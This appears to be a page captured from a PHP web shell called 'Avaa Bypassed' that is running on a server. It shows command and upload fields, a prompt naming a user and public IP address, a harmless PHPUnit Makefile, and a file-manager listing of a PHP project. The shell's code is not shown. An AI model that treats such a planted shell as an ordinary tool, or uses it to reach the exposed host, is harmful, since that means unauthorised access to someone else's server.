404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.139.98.233: ~ $
all: clean test

test:
	vendor/bin/phpunit

coverage:
	vendor/bin/phpunit --coverage-html=artifacts/coverage

view-coverage:
	open artifacts/coverage/index.html

clean:
	rm -rf artifacts/*

Filemanager

Name Type Size Permission Actions
src Folder 2755
CHANGELOG.md File 1.8 KB 0755
LICENSE File 1.25 KB 0755
Makefile File 189 B 0755
README.md File 17 KB 0755
composer.json File 1.46 KB 0755